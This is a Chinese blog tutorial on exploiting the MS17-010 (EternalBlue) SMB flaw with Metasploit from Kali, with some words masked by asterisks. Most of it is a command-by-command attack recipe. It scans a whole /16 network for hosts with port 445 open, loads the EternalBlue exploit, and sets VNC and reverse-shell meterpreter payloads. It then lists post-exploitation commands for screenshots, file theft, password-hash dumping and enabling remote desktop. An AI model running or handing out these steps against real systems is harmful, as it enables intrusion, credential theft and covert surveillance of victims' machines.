永恒之蓝其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,通过这个漏洞可以影响445端口。***就是通过在网络上扫描开放的445端口,然后把***病毒植入被***电脑。


    这里使用MSF 实现 “永恒之蓝”的快速***,就是利用Metasploit中针对ms17-101漏洞的***载荷进行***获取主机控制权限。我这里简单的记录下整个***利用所需要的工具准备、利用过程以及后***的一些简单内容。


本次***测试在kali中进行


首先 扫描局域网存在漏洞主机

    msfconsole    #启动msf

    use auxiliary/scanner/smb/smb_ms17_010   #加载ms_17_010模块

    show options    #查看配置

 内网***之永恒之蓝——ms17_010 

(这里可以看到RHOSTS后边的required为yes 所以必须设置,为no的则不必须)


    set RHOSTS 192.168.0.0/16    #设置扫描网段 RHOSTS(RHOSTS表示多个ip)

内网***之永恒之蓝——ms17_010

(这里可以看到THREADS为1  速度太慢 我们设置成100)


    set THREADS 100    #设置线程为100

    run        #启动  


接下来就是等待扫描结果看看哪个可以利用



其次 进行***(另一个shell窗口中进行)

    msfconsole    #启动msf   

    search ms17_010   #搜索******模块

内网***之永恒之蓝——ms17_010

(这里看到搜索到******模块2个,但是他们是一样的)


   use exploit/windows/smb/ms17_010_eternalblue  #加载******模块

    show options    #展示***载荷

内网***之永恒之蓝——ms17_010 

(这里看到需要设置RHOST 将上边扫描到的可利用主机ip 设置为RHOST)


    set RHOST [ip]      #RHOST 仅一个ip

    接下来是设置***载荷payload,不同的payload有不同的功能


#设置***载荷①

    set payload windows/x64/vncinject/bind_tcp     #用于屏幕监控

    exploit

    然后你就可以看到他的屏幕了

    

#设置***载荷②

    set payload windows/x64/meterpreter/reverse_tcp  

    show options   #查看所需配置  

    set LHOST  [本机ip]  #配置参数   

    exploit   #进行*** 


    **********此***载荷下有很多命令,不一一细说**************

    **********     只说几个简单的        ***************

    ********** 截屏  screenshot          ***************

    ********** 屏幕监控  run vnc (若对方电脑上有安全软件会不稳定或者失败)

    **********   进入对方cmd  shell      *****************

    **********  进入cmd之后命令可就多了 你懂得 **************

    ********** 下载文件 download filepath    **************

    ********** 上传文件 upload 本机path 对方path *************

    ********** 获得密码hash   hashdump    ******************

    ********** 开启3389远程桌面 run post/windows/manage/enable_rdp

    ***********************************************************



更多 更详细的内容请参照 http://helloeveryone.blog.51cto.com/6171143/1112040/